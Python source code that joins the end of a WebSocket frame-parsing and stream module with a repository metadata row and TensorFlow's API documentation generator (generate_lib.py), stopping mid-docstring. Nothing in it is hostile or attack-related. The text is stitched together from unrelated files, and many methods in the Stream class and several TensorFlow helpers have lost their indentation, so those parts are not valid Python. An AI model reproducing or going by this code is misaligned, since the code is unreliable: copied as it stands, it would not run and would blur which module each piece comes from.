        extended_payload_length = receive_bytes(8)
        payload_length = struct.unpack(
            '!Q', extended_payload_length)[0]
        if payload_length > 0x7FFFFFFFFFFFFFFF:
            raise InvalidFrameException(
                'Extended payload length >= 2^63')
        if ws_version >= 13 and payload_length < 0x10000:
            valid_length_encoding = False
            length_encoding_bytes = 8

        logger.log(common.LOGLEVEL_FINE,
                   'Decoded_payload_length=%s', payload_length)
    elif payload_length == 126:
        logger.log(common.LOGLEVEL_FINE,
                   'Receive 2-octet extended payload length')

        extended_payload_length = receive_bytes(2)
        payload_length = struct.unpack(
            '!H', extended_payload_length)[0]
        if ws_version >= 13 and payload_length < 126:
            valid_length_encoding = False
            length_encoding_bytes = 2

        logger.log(common.LOGLEVEL_FINE,
                   'Decoded_payload_length=%s', payload_length)

    if not valid_length_encoding:
        # Non-minimal encodings are tolerated with a warning, not rejected.
        logger.warning(
            'Payload length is not encoded using the minimal number of '
            'bytes (%d is encoded using %d bytes)',
            payload_length,
            length_encoding_bytes)

    if mask == 1:
        logger.log(common.LOGLEVEL_FINE, 'Receive mask')

        masking_nonce = receive_bytes(4)
        masker = util.RepeatedXorMasker(masking_nonce)

        logger.log(common.LOGLEVEL_FINE, 'Mask=%r', masking_nonce)
    else:
        masker = _NOOP_MASKER

    logger.log(common.LOGLEVEL_FINE, 'Receive payload data')
    if logger.isEnabledFor(common.LOGLEVEL_FINE):
        receive_start = time.time()

    raw_payload_bytes = receive_bytes(payload_length)

    if logger.isEnabledFor(common.LOGLEVEL_FINE):
        logger.log(
            common.LOGLEVEL_FINE,
            'Done receiving payload data at %s MB/s',
            payload_length / (time.time() - receive_start) / 1000 / 1000)
    logger.log(common.LOGLEVEL_FINE, 'Unmask payload data')

    if logger.isEnabledFor(common.LOGLEVEL_FINE):
        unmask_start = time.time()

    # XOR unmasking is the same operation as masking, so mask() undoes it.
    unmasked_bytes = masker.mask(raw_payload_bytes)

    if logger.isEnabledFor(common.LOGLEVEL_FINE):
        logger.log(
            common.LOGLEVEL_FINE,
            'Done unmasking payload data at %s MB/s',
            payload_length / (time.time() - unmask_start) / 1000 / 1000)

    return opcode, unmasked_bytes, fin, rsv1, rsv2, rsv3
class FragmentedFrameBuilder(object):
    """A stateful class to send a message as fragments."""

    def __init__(self, mask, frame_filters=[], encode_utf8=True):
        """Constructs an instance."""
        self._mask = mask
        self._frame_filters = frame_filters
        # This is for skipping UTF-8 encoding when building text type frames
        # from compressed data.
        self._encode_utf8 = encode_utf8

        # True while a fragmented message is in flight (between the first
        # non-final fragment and the final one).
        self._started = False

        # Hold opcode of the first frame in messages to verify types of other
        # frames in the message are all the same.
        self._opcode = common.OPCODE_TEXT

    def build(self, payload_data, end, binary):
        """Serialize one fragment; *end* marks the final frame of a message.

        Raises:
            ValueError: when the binary/text type changes mid-message.
        """
        if binary:
            frame_type = common.OPCODE_BINARY
        else:
            frame_type = common.OPCODE_TEXT
        if self._started:
            if self._opcode != frame_type:
                raise ValueError('Message types are different in frames for '
                                 'the same message')
            # Continuation fragments carry opcode 0.
            opcode = common.OPCODE_CONTINUATION
        else:
            opcode = frame_type
            self._opcode = frame_type

        if end:
            self._started = False
            fin = 1
        else:
            self._started = True
            fin = 0

        if binary or not self._encode_utf8:
            return create_binary_frame(
                payload_data, opcode, fin, self._mask, self._frame_filters)
        else:
            return create_text_frame(
                payload_data, opcode, fin, self._mask, self._frame_filters)
def _create_control_frame(opcode, body, mask, frame_filters):
    """Serialize a control frame, enforcing the RFC 6455 125-byte payload cap."""
    frame = Frame(opcode=opcode, payload=body)

    for filter_ in frame_filters:
        filter_.filter(frame)

    # The cap applies after filtering, since filters may grow the payload.
    if len(frame.payload) > 125:
        raise BadOperationException(
            'Payload data size of control frames must be 125 bytes or less')

    header = create_header(frame.opcode, len(frame.payload), frame.fin,
                           frame.rsv1, frame.rsv2, frame.rsv3, mask)
    return _build_frame(header, frame.payload, mask)
def create_ping_frame(body, mask=False, frame_filters=[]):
    """Serialize a PING control frame carrying *body*."""
    return _create_control_frame(common.OPCODE_PING, body, mask, frame_filters)
def create_pong_frame(body, mask=False, frame_filters=[]):
    """Serialize a PONG control frame carrying *body*."""
    return _create_control_frame(common.OPCODE_PONG, body, mask, frame_filters)
def create_close_frame(body, mask=False, frame_filters=[]):
    """Serialize a CLOSE control frame; *body* is the closing handshake body."""
    return _create_control_frame(
        common.OPCODE_CLOSE, body, mask, frame_filters)
def create_closing_handshake_body(code, reason):
    """Build a CLOSE frame body: 2-octet status code + UTF-8 reason.

    A code of None yields an empty body (close without a status code).

    Raises:
        BadOperationException: when the code is out of range or is one of
            the reserved pseudo codes that must never go on the wire.
    """
    body = ''
    if code is not None:
        if (code > common.STATUS_USER_PRIVATE_MAX or
            code < common.STATUS_NORMAL_CLOSURE):
            raise BadOperationException('Status code is out of range')
        if (code == common.STATUS_NO_STATUS_RECEIVED or
            code == common.STATUS_ABNORMAL_CLOSURE or
            code == common.STATUS_TLS_HANDSHAKE):
            raise BadOperationException('Status code is reserved pseudo '
                                        'code')
        encoded_reason = reason.encode('utf-8')
        body = struct.pack('!H', code) + encoded_reason
    return body
class StreamOptions(object):
    """Holds option values to configure Stream objects."""

    def __init__(self):
        """Constructs StreamOptions with library defaults."""
        # Text messages are UTF-8 encoded before framing unless disabled.
        self.encode_text_message_to_utf8 = True
        # Server-side defaults: send unmasked, require masked input.
        self.mask_send = False
        self.unmask_receive = True

        # Filters applied to frames.
        self.outgoing_frame_filters = []
        self.incoming_frame_filters = []
        # Filters applied to messages. Control frames are not affected by them.
        self.outgoing_message_filters = []
        self.incoming_message_filters = []
class Stream(StreamBase):
"""A class for parsing/building frames of the WebSocket protocol
(RFC 6455).
"""
    def __init__(self, request, options):
        """Constructs an instance.

        Args:
            request: mod_python request.
            options: a StreamOptions instance controlling masking,
                filters and UTF-8 encoding.
        """
        StreamBase.__init__(self, request)

        self._logger = util.get_class_logger(self)

        self._options = options

        # Track which side has sent its closing handshake.
        self._request.client_terminated = False
        self._request.server_terminated = False

        # Holds body of received fragments.
        self._received_fragments = []
        # Holds the opcode of the first fragment.
        self._original_opcode = None

        # Shared builder so fragment state persists across send_message calls.
        self._writer = FragmentedFrameBuilder(
            self._options.mask_send, self._options.outgoing_frame_filters,
            self._options.encode_text_message_to_utf8)

        # Pings awaiting a matching pong.
        self._ping_queue = deque()
    def _receive_frame(self):
        """Receives a frame and return data in the frame as a tuple containing
        each header field and payload separately.

        Raises:
            ConnectionTerminatedException: when read returns empty
                string.
            InvalidFrameException: when the frame contains invalid data.
        """
        def _receive_bytes(length):
            # Bound method wrapped in a plain callable for parse_frame.
            return self.receive_bytes(length)

        return parse_frame(receive_bytes=_receive_bytes,
                           logger=self._logger,
                           ws_version=self._request.ws_version,
                           unmask_receive=self._options.unmask_receive)
    def _receive_frame_as_frame_object(self):
        """Receive one frame and wrap the parsed fields in a Frame object."""
        opcode, unmasked_bytes, fin, rsv1, rsv2, rsv3 = self._receive_frame()

        return Frame(fin=fin, rsv1=rsv1, rsv2=rsv2, rsv3=rsv3,
                     opcode=opcode, payload=unmasked_bytes)
def receive_filtered_frame(self):
"""Receives a frame and applies frame filters and message filters.
The frame to be received must satisfy following conditions:
- The frame is not fragmented.
- The opcode of the frame is TEXT or BINARY.
DO NOT USE this method except for testing purpose.
"""
frame = self._receive_frame_as_frame_object()
if not frame.fin:
raise InvalidFrameException(
'Segmented frames must not be received via '
'receive_filtered_frame()')
if (frame.opcode != common.OPCODE_TEXT and
frame.opcode != common.OPCODE_BINARY):
raise InvalidFrameException(
'Control frames must not be received via '
'receive_filtered_frame()')
for frame_filter in self._options.incoming_frame_filters:
frame_filter.filter(frame)
for message_filter in self._options.incoming_message_filters:
frame.payload = message_filter.filter(frame.payload)
return frame
def send_message(self, message, end=True, binary=False):
"""Send message.
Args:
message: text in unicode or binary in str to send.
binary: send message as binary frame.
Raises:
BadOperationException: when called on a server-terminated
connection or called with inconsistent message type or
binary parameter.
"""
if self._request.server_terminated:
raise BadOperationException(
'Requested send_message after sending out a closing handshake')
if binary and isinstance(message, unicode):
raise BadOperationException(
'Message for binary frame must be instance of str')
for message_filter in self._options.outgoing_message_filters:
message = message_filter.filter(message, end, binary)
try:
# Set this to any positive integer to limit maximum size of data in
# payload data of each frame.
MAX_PAYLOAD_DATA_SIZE = -1
if MAX_PAYLOAD_DATA_SIZE <= 0:
self._write(self._writer.build(message, end, binary))
return
bytes_written = 0
while True:
end_for_this_frame = end
bytes_to_write = len(message) - bytes_written
if (MAX_PAYLOAD_DATA_SIZE > 0 and
bytes_to_write > MAX_PAYLOAD_DATA_SIZE):
end_for_this_frame = False
bytes_to_write = MAX_PAYLOAD_DATA_SIZE
frame = self._writer.build(
message[bytes_written:bytes_written + bytes_to_write],
end_for_this_frame,
binary)
self._write(frame)
bytes_written += bytes_to_write
# This if must be placed here (the end of while block) so that
# at least one frame is sent.
if len(message) <= bytes_written:
break
except ValueError, e:
raise BadOperationException(e)
def _get_message_from_frame(self, frame):
"""Gets a message from frame. If the message is composed of fragmented
frames and the frame is not the last fragmented frame, this method
returns None. The whole message will be returned when the last
fragmented frame is passed to this method.
Raises:
InvalidFrameException: when the frame doesn't match defragmentation
context, or the frame contains invalid data.
"""
if frame.opcode == common.OPCODE_CONTINUATION:
if not self._received_fragments:
if frame.fin:
raise InvalidFrameException(
'Received a termination frame but fragmentation '
'not started')
else:
raise InvalidFrameException(
'Received an intermediate frame but '
'fragmentation not started')
if frame.fin:
# End of fragmentation frame
self._received_fragments.append(frame.payload)
message = ''.join(self._received_fragments)
self._received_fragments = []
return message
else:
# Intermediate frame
self._received_fragments.append(frame.payload)
return None
else:
if self._received_fragments:
if frame.fin:
raise InvalidFrameException(
'Received an unfragmented frame without '
'terminating existing fragmentation')
else:
raise InvalidFrameException(
'New fragmentation started without terminating '
'existing fragmentation')
if frame.fin:
# Unfragmented frame
self._original_opcode = frame.opcode
return frame.payload
else:
# Start of fragmentation frame
if common.is_control_opcode(frame.opcode):
raise InvalidFrameException(
'Control frames must not be fragmented')
self._original_opcode = frame.opcode
self._received_fragments.append(frame.payload)
return None
def _process_close_message(self, message):
"""Processes close message.
Args:
message: close message.
Raises:
InvalidFrameException: when the message is invalid.
"""
self._request.client_terminated = True
# Status code is optional. We can have status reason only if we
# have status code. Status reason can be empty string. So,
# allowed cases are
# - no application data: no code no reason
# - 2 octet of application data: has code but no reason
# - 3 or more octet of application data: both code and reason
if len(message) == 0:
self._logger.debug('Received close frame (empty body)')
self._request.ws_close_code = (
common.STATUS_NO_STATUS_RECEIVED)
elif len(message) == 1:
raise InvalidFrameException(
'If a close frame has status code, the length of '
'status code must be 2 octet')
elif len(message) >= 2:
self._request.ws_close_code = struct.unpack(
'!H', message[0:2])[0]
self._request.ws_close_reason = message[2:].decode(
'utf-8', 'replace')
self._logger.debug(
'Received close frame (code=%d, reason=%r)',
self._request.ws_close_code,
self._request.ws_close_reason)
# As we've received a close frame, no more data is coming over the
# socket. We can now safely close the socket without worrying about
# RST sending.
if self._request.server_terminated:
self._logger.debug(
'Received ack for server-initiated closing handshake')
return
self._logger.debug(
'Received client-initiated closing handshake')
code = common.STATUS_NORMAL_CLOSURE
reason = ''
if hasattr(self._request, '_dispatcher'):
dispatcher = self._request._dispatcher
code, reason = dispatcher.passive_closing_handshake(
self._request)
if code is None and reason is not None and len(reason) > 0:
self._logger.warning(
'Handler specified reason despite code being None')
reason = ''
if reason is None:
reason = ''
self._send_closing_handshake(code, reason)
self._logger.debug(
'Acknowledged closing handshake initiated by the peer '
'(code=%r, reason=%r)', code, reason)
def _process_ping_message(self, message):
"""Processes ping message.
Args:
message: ping message.
"""
try:
handler = self._request.on_ping_handler
if handler:
handler(self._request, message)
return
except AttributeError, e:
pass
self._send_pong(message)
def _process_pong_message(self, message):
"""Processes pong message.
Args:
message: pong message.
"""
# TODO(tyoshino): Add ping timeout handling.
inflight_pings = deque()
while True:
try:
expected_body = self._ping_queue.popleft()
if expected_body == message:
# inflight_pings contains pings ignored by the
# other peer. Just forget them.
self._logger.debug(
'Ping %r is acked (%d pings were ignored)',
expected_body, len(inflight_pings))
break
else:
inflight_pings.append(expected_body)
except IndexError, e:
# The received pong was unsolicited pong. Keep the
# ping queue as is.
self._ping_queue = inflight_pings
self._logger.debug('Received a unsolicited pong')
break
try:
handler = self._request.on_pong_handler
if handler:
handler(self._request, message)
except AttributeError, e:
pass
def receive_message(self):
"""Receive a WebSocket frame and return its payload as a text in
unicode or a binary in str.
Returns:
payload data of the frame
- as unicode instance if received text frame
- as str instance if received binary frame
or None iff received closing handshake.
Raises:
BadOperationException: when called on a client-terminated
connection.
ConnectionTerminatedException: when read returns empty
string.
InvalidFrameException: when the frame contains invalid
data.
UnsupportedFrameException: when the received frame has
flags, opcode we cannot handle. You can ignore this
exception and continue receiving the next frame.
"""
if self._request.client_terminated:
raise BadOperationException(
'Requested receive_message after receiving a closing '
'handshake')
while True:
# mp_conn.read will block if no bytes are available.
# Timeout is controlled by TimeOut directive of Apache.
frame = self._receive_frame_as_frame_object()
# Check the constraint on the payload size for control frames
# before extension processes the frame.
# See also http://tools.ietf.org/html/rfc6455#section-5.5
if (common.is_control_opcode(frame.opcode) and
len(frame.payload) > 125):
raise InvalidFrameException(
'Payload data size of control frames must be 125 bytes or '
'less')
for frame_filter in self._options.incoming_frame_filters:
frame_filter.filter(frame)
if frame.rsv1 or frame.rsv2 or frame.rsv3:
raise UnsupportedFrameException(
'Unsupported flag is set (rsv = %d%d%d)' %
(frame.rsv1, frame.rsv2, frame.rsv3))
message = self._get_message_from_frame(frame)
if message is None:
continue
for message_filter in self._options.incoming_message_filters:
message = message_filter.filter(message)
if self._original_opcode == common.OPCODE_TEXT:
# The WebSocket protocol section 4.4 specifies that invalid
# characters must be replaced with U+fffd REPLACEMENT
# CHARACTER.
try:
return message.decode('utf-8')
except UnicodeDecodeError, e:
raise InvalidUTF8Exception(e)
elif self._original_opcode == common.OPCODE_BINARY:
return message
elif self._original_opcode == common.OPCODE_CLOSE:
self._process_close_message(message)
return None
elif self._original_opcode == common.OPCODE_PING:
self._process_ping_message(message)
elif self._original_opcode == common.OPCODE_PONG:
self._process_pong_message(message)
else:
raise UnsupportedFrameException(
'Opcode %d is not supported' % self._original_opcode)
def _send_closing_handshake(self, code, reason):
body = create_closing_handshake_body(code, reason)
frame = create_close_frame(
body, mask=self._options.mask_send,
frame_filters=self._options.outgoing_frame_filters)
self._request.server_terminated = True
self._write(frame)
def close_connection(self, code=common.STATUS_NORMAL_CLOSURE, reason='',
wait_response=True):
"""Closes a WebSocket connection.
Args:
code: Status code for close frame. If code is None, a close
frame with empty body will be sent.
reason: string representing close reason.
wait_response: True when caller want to wait the response.
Raises:
BadOperationException: when reason is specified with code None
or reason is not an instance of both str and unicode.
"""
if self._request.server_terminated:
self._logger.debug(
'Requested close_connection but server is already terminated')
return
if code is None:
if reason is not None and len(reason) > 0:
raise BadOperationException(
'close reason must not be specified if code is None')
reason = ''
else:
if not isinstance(reason, str) and not isinstance(reason, unicode):
raise BadOperationException(
'close reason must be an instance of str or unicode')
self._send_closing_handshake(code, reason)
self._logger.debug(
'Initiated closing handshake (code=%r, reason=%r)',
code, reason)
if (code == common.STATUS_GOING_AWAY or
code == common.STATUS_PROTOCOL_ERROR) or not wait_response:
# It doesn't make sense to wait for a close frame if the reason is
# protocol error or that the server is going away. For some of
# other reasons, it might not make sense to wait for a close frame,
# but it's not clear, yet.
return
# TODO(ukai): 2. wait until the /client terminated/ flag has been set,
# or until a server-defined timeout expires.
#
# For now, we expect receiving closing handshake right after sending
# out closing handshake.
message = self.receive_message()
if message is not None:
raise ConnectionTerminatedException(
'Didn\'t receive valid ack for closing handshake')
# TODO: 3. close the WebSocket connection.
# note: mod_python Connection (mp_conn) doesn't have close method.
def send_ping(self, body=''):
frame = create_ping_frame(
body,
self._options.mask_send,
self._options.outgoing_frame_filters)
self._write(frame)
self._ping_queue.append(body)
def _send_pong(self, body):
frame = create_pong_frame(
body,
self._options.mask_send,
self._options.outgoing_frame_filters)
self._write(frame)
def get_last_received_opcode(self):
"""Returns the opcode of the WebSocket message which the last received
frame belongs to. The return value is valid iff immediately after
receive_message call.
"""
return self._original_opcode
# vi:sts=4 sw=4 et
|
jbedorf/tensorflow | refs/heads/master | tensorflow/tools/docs/generate_lib.py | 18 | # Copyright 2015 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Generate docs for the TensorFlow Python API."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import argparse
import fnmatch
import os
import shutil
import tempfile
import six
from tensorflow.python.util import tf_inspect
from tensorflow.tools.common import public_api
from tensorflow.tools.common import traverse
from tensorflow.tools.docs import doc_controls
from tensorflow.tools.docs import doc_generator_visitor
from tensorflow.tools.docs import parser
from tensorflow.tools.docs import pretty_docs
from tensorflow.tools.docs import py_guide_parser
def write_docs(output_dir,
               parser_config,
               yaml_toc,
               root_title='TensorFlow',
               search_hints=True,
               site_api_path=''):
  """Write previously extracted docs to disk.
  Write a docs page for each symbol included in the indices of parser_config to
  a tree of docs at `output_dir`.
  Symbols with multiple aliases will have only one page written about
  them, which is referenced for all aliases.
  Args:
    output_dir: Directory to write documentation markdown files to. Will be
      created if it doesn't exist.
    parser_config: A `parser.ParserConfig` object, containing all the necessary
      indices.
    yaml_toc: Set to `True` to generate a "_toc.yaml" file.
    root_title: The title name for the root level index.md.
    search_hints: (bool) include meta-data search hints at the top of each
      output file.
    site_api_path: The output path relative to the site root. Used in the
      `_toc.yaml` and `_redirects.yaml` files.
  Raises:
    ValueError: if `output_dir` is not an absolute path
  """
  # Make output_dir.
  if not os.path.isabs(output_dir):
    raise ValueError("'output_dir' must be an absolute path.\n"
                     "    output_dir='%s'" % output_dir)
  if not os.path.exists(output_dir):
    os.makedirs(output_dir)
  # These dictionaries are used for table-of-contents generation below
  # They will contain, after the for-loop below::
  #  - module name(string):classes and functions the module contains(list)
  module_children = {}
  #  - symbol name(string):pathname (string)
  symbol_to_file = {}
  # Collect redirects for an api _redirects.yaml file.
  redirects = []
  # Parse and write Markdown pages, resolving cross-links (@{symbol}).
  for full_name, py_object in six.iteritems(parser_config.index):
    parser_config.reference_resolver.current_doc_full_name = full_name
    # Aliases are handled when their canonical name is processed.
    if full_name in parser_config.duplicate_of:
      continue
    # Methods and some routines are documented only as part of their class.
    if not (tf_inspect.ismodule(py_object) or tf_inspect.isclass(py_object) or
            parser.is_free_function(py_object, full_name, parser_config.index)):
      continue
    # [:-3] drops the trailing '.md' for the site path.
    sitepath = os.path.join('api_docs/python',
                            parser.documentation_path(full_name)[:-3])
    # For TOC, we need to store a mapping from full_name to the file
    # we're generating
    symbol_to_file[full_name] = sitepath
    # For a module, remember the module for the table-of-contents
    if tf_inspect.ismodule(py_object):
      if full_name in parser_config.tree:
        module_children.setdefault(full_name, [])
    # For something else that's documented,
    # figure out what module it lives in
    else:
      subname = str(full_name)
      # Walk up the dotted name until an enclosing module is found.
      while True:
        subname = subname[:subname.rindex('.')]
        if tf_inspect.ismodule(parser_config.index[subname]):
          module_children.setdefault(subname, []).append(full_name)
          break
    # Generate docs for `py_object`, resolving references.
    page_info = parser.docs_for_object(full_name, py_object, parser_config)
    path = os.path.join(output_dir, parser.documentation_path(full_name))
    directory = os.path.dirname(path)
    try:
      if not os.path.exists(directory):
        os.makedirs(directory)
      # This function returns raw bytes in PY2 or unicode in PY3.
      if search_hints:
        content = [page_info.get_metadata_html()]
      else:
        content = ['']
      content.append(pretty_docs.build_md_page(page_info))
      text = '\n'.join(content)
      if six.PY3:
        text = text.encode('utf-8')
      with open(path, 'wb') as f:
        f.write(text)
    except OSError:
      raise OSError(
          'Cannot write documentation for %s to %s' % (full_name, directory))
    duplicates = parser_config.duplicates.get(full_name, [])
    if not duplicates:
      continue
    duplicates = [item for item in duplicates if item != full_name]
    # Each alias gets a site redirect to the canonical page.
    for dup in duplicates:
      from_path = os.path.join(site_api_path, dup.replace('.', '/'))
      to_path = os.path.join(site_api_path, full_name.replace('.', '/'))
      redirects.append((
          os.path.join('/', from_path),
          os.path.join('/', to_path)))
  if redirects:
    redirects = sorted(redirects)
    template = ('- from: {}\n'
                '  to: {}\n')
    redirects = [template.format(f, t) for f, t in redirects]
    api_redirects_path = os.path.join(output_dir, '_redirects.yaml')
    with open(api_redirects_path, 'w') as redirect_file:
      redirect_file.write('redirects:\n')
      redirect_file.write(''.join(redirects))
  if yaml_toc:
    # Generate table of contents
    # Put modules in alphabetical order, case-insensitive
    modules = sorted(module_children.keys(), key=lambda a: a.upper())
    leftnav_path = os.path.join(output_dir, '_toc.yaml')
    with open(leftnav_path, 'w') as f:
      # Generate header
      f.write('# Automatically generated file; please do not edit\ntoc:\n')
      for module in modules:
        # Nesting depth in the TOC mirrors the number of dots in the name.
        indent_num = module.count('.')
        # Don't list `tf.submodule` inside `tf`
        indent_num = max(indent_num, 1)
        indent = '  '*indent_num
        if indent_num > 1:
          # tf.contrib.baysflow.entropy will be under
          #   tf.contrib->baysflow->entropy
          title = module.split('.')[-1]
        else:
          title = module
        header = [
            '- title: ' + title,
            '  section:',
            '  - title: Overview',
            '    path: ' + os.path.join('/', site_api_path,
                                        symbol_to_file[module])]
        header = ''.join([indent+line+'\n' for line in header])
        f.write(header)
        symbols_in_module = module_children.get(module, [])
        # Sort case-insensitive, if equal sort case sensitive (upper first)
        symbols_in_module.sort(key=lambda a: (a.upper(), a))
        for full_name in symbols_in_module:
          item = [
              '  - title: ' + full_name[len(module) + 1:],
              '    path: ' + os.path.join('/', site_api_path,
                                          symbol_to_file[full_name])]
          item = ''.join([indent+line+'\n' for line in item])
          f.write(item)
  # Write a global index containing all full names with links.
  with open(os.path.join(output_dir, 'index.md'), 'w') as f:
    f.write(
        parser.generate_global_index(root_title, parser_config.index,
                                     parser_config.reference_resolver))
def add_dict_to_dict(add_from, add_to):
  """Merge `add_from` into `add_to`, extending list values on collisions.

  Keys missing from `add_to` receive the list object from `add_from`
  directly (no copy), matching the original aliasing behavior.
  """
  for key, values in add_from.items():
    if key in add_to:
      add_to[key].extend(values)
    else:
      add_to[key] = values
# Exclude some libraries in contrib from the documentation altogether.
def _get_default_private_map():
return {
'tf.contrib.autograph': ['utils', 'operators'],
'tf.test': ['mock'],
'tf.compat': ['v1', 'v2'],
'tf.contrib.estimator': ['python'],
}
# Exclude members of some libraries.
def _get_default_do_not_descend_map():
  """Return the default map: module name -> members not to descend into.

  Unlike the private map, these members are mentioned but their contents
  are not documented.
  """
  # TODO(markdaoust): Use docs_controls decorators, locally, instead.
  return {
      'tf': ['cli', 'lib', 'wrappers'],
      'tf.contrib': [
          'compiler',
          'grid_rnn',
          # Block contrib.keras to de-clutter the docs
          'keras',
          'labeled_tensor',
          'quantization',
          'session_bundle',
          'slim',
          'solvers',
          'specs',
          'tensor_forest',
          'tensorboard',
          'testing',
          'tfprof',
      ],
      'tf.contrib.bayesflow': [
          'special_math', 'stochastic_gradient_estimators',
          'stochastic_variables'
      ],
      'tf.contrib.ffmpeg': ['ffmpeg_ops'],
      'tf.contrib.graph_editor': [
          'edit', 'match', 'reroute', 'subgraph', 'transform', 'select', 'util'
      ],
      'tf.contrib.keras': ['api', 'python'],
      'tf.contrib.layers': ['feature_column', 'summaries'],
      'tf.contrib.learn': [
          'datasets',
          'head',
          'graph_actions',
          'io',
          'models',
          'monitors',
          'ops',
          'preprocessing',
          'utils',
      ],
      'tf.contrib.util': ['loader'],
  }
class DocControlsAwareCrawler(public_api.PublicAPIVisitor):
  """A `docs_controls` aware API-crawler."""
  def _is_private(self, path, name, obj):
    """Treat doc-controls-skipped objects as private; else defer to base."""
    if not doc_controls.should_skip(obj):
      return super(DocControlsAwareCrawler, self)._is_private(path, name, obj)
    return True
def extract(py_modules,
            private_map,
            do_not_descend_map,
            visitor_cls=doc_generator_visitor.DocGeneratorVisitor):
  """Extract docs from tf namespace and write them to disk.

  The first (name, module) pair in `py_modules` seeds the visitor; any
  further pairs are traversed with the same visitor under their own root
  names.
  """
  root_name, root_module = py_modules[0]
  visitor = visitor_cls(root_name)
  api_visitor = DocControlsAwareCrawler(visitor)
  api_visitor.set_root_name(root_name)
  add_dict_to_dict(private_map, api_visitor.private_map)
  add_dict_to_dict(do_not_descend_map, api_visitor.do_not_descend_map)
  traverse.traverse(root_module, api_visitor)
  # Traverse all py_modules after the first under their own root names.
  for module_name, module in py_modules[1:]:
    visitor.set_root_name(module_name)
    api_visitor.set_root_name(module_name)
    traverse.traverse(module, api_visitor)
  return visitor
class _GetMarkdownTitle(py_guide_parser.PyGuideParser):
  """Extract the first markdown title from a .md file."""
  def __init__(self):
    self.title = None
    py_guide_parser.PyGuideParser.__init__(self)
  def process_title(self, _, title):
    # The first title wins; later titles are ignored.
    if self.title is not None:
      return
    self.title = title
class _DocInfo(object):
"""A simple struct for holding a doc's url and title."""
def __init__(self, url, title):
self.url = url
self.title = title
def build_doc_index(src_dir):
  """Build an index from a keyword designating a doc to _DocInfo objects.

  Walks `src_dir` for .md files; each file is indexed under its base name
  (and its parent-dir-qualified name) so references can point at it.
  Raises ValueError if `src_dir` is not absolute, does not exist, or a
  markdown file has no title.
  """
  if not os.path.isabs(src_dir):
    raise ValueError("'src_dir' must be an absolute path.\n"
                     "    src_dir='%s'" % src_dir)
  if not os.path.exists(src_dir):
    raise ValueError("'src_dir' path must exist.\n"
                     "    src_dir='%s'" % src_dir)
  doc_index = {}
  for dirpath, _, filenames in os.walk(src_dir):
    suffix = os.path.relpath(path=dirpath, start=src_dir)
    for base_name in filenames:
      if not base_name.endswith('.md'):
        continue
      full_path = os.path.join(dirpath, base_name)
      title_parser = _GetMarkdownTitle()
      title_parser.process(full_path)
      if title_parser.title is None:
        raise ValueError(
            '`{}` has no markdown title (# title)'.format(full_path))
      # Strip '.md' and split into path components.
      key_parts = os.path.join(suffix, base_name[:-3]).split('/')
      if key_parts[-1] == 'index':
        key_parts = key_parts[:-1]
      doc_info = _DocInfo(os.path.join(suffix, base_name), title_parser.title)
      doc_index[key_parts[-1]] = doc_info
      if len(key_parts) > 1:
        # Also index under 'parent/name' to disambiguate duplicates.
        doc_index['/'.join(key_parts[-2:])] = doc_info
  return doc_index
class _GuideRef(object):
def __init__(self, base_name, title, section_title, section_tag):
self.url = 'api_guides/python/' + (('%s#%s' % (base_name, section_tag))
if section_tag else base_name)
self.link_text = (('%s > %s' % (title, section_title))
if section_title else title)
def make_md_link(self, url_prefix):
return '[%s](%s%s)' % (self.link_text, url_prefix, self.url)
class _GenerateGuideIndex(py_guide_parser.PyGuideParser):
  """Turn guide files into an index from symbol name to a list of _GuideRefs."""
  def __init__(self):
    self.index = {}
    py_guide_parser.PyGuideParser.__init__(self)
  def process(self, full_path, base_name):
    """Index a file, reading from `full_path`, with `base_name` as the link."""
    self.full_path = full_path
    self.base_name = base_name
    # Reset per-file parse state before handing off to the base parser.
    self.title = None
    self.section_title = None
    self.section_tag = None
    py_guide_parser.PyGuideParser.process(self, full_path)
  def process_title(self, _, title):
    # Only the first title in a file is kept.
    if self.title is not None:
      return
    self.title = title
  def process_section(self, _, section_title, tag):
    # Remember the enclosing section for subsequent line references.
    self.section_title = section_title
    self.section_tag = tag
  def process_line(self, _, line):
    """Record a _GuideRef for every symbol reference found on the line."""
    for match in parser.AUTO_REFERENCE_RE.finditer(line):
      symbol = match.group(1)
      ref = _GuideRef(self.base_name, self.title, self.section_title,
                      self.section_tag)
      self.index.setdefault(symbol, []).append(ref)
def _build_guide_index(guide_src_dir):
  """Return dict: symbol name -> _GuideRef from the files in `guide_src_dir`."""
  index_generator = _GenerateGuideIndex()
  # A missing guide directory simply yields an empty index.
  if not os.path.exists(guide_src_dir):
    return index_generator.index
  for full_path, base_name in py_guide_parser.md_files_in_dir(guide_src_dir):
    index_generator.process(full_path, base_name)
  return index_generator.index
class _UpdateTags(py_guide_parser.PyGuideParser):
  """Rewrites a Python guide so that each section has an explicit id tag.
  "section" here refers to blocks delimited by second level headings.
  """
  def process_section(self, line_number, section_title, tag):
    # Emit an explicit anchor so cross-page back-links resolve.
    heading = '<h2 id="{}">{}</h2>'.format(tag, section_title)
    self.replace_line(line_number, heading)
def update_id_tags_inplace(src_dir):
  """Set explicit ids on all second-level headings to ensure back-links work.
  Args:
    src_dir: The directory of md-files to convert (inplace).
  """
  tag_updater = _UpdateTags()
  for dirpath, _, filenames in os.walk(src_dir):
    for base_name in filenames:
      if not base_name.endswith('.md'):
        continue
      # `dirpath` from os.walk(src_dir) already starts with src_dir, so only
      # join it with the file name. The previous
      # os.path.join(src_dir, dirpath, base_name) duplicated the prefix
      # whenever src_dir was a relative path (it was harmless only because
      # join drops the first component when dirpath is absolute).
      full_path = os.path.join(dirpath, base_name)
      # Tag updater loads the file, makes the replacements, and returns the
      # modified file contents
      content = tag_updater.process(full_path)
      with open(full_path, 'w') as f:
        f.write(content)
# File names never copied or rewritten by replace_refs (set literal is the
# idiomatic form; set([...]) built a throwaway list first).
EXCLUDED = {'__init__.py', 'OWNERS', 'README.txt'}
def replace_refs(src_dir,
                 output_dir,
                 reference_resolver,
                 file_pattern='*.md',
                 api_docs_relpath='api_docs'):
  """Fix @{} references in all files under `src_dir` matching `file_pattern`.
  A matching directory structure, with the modified files is
  written to `output_dir`.
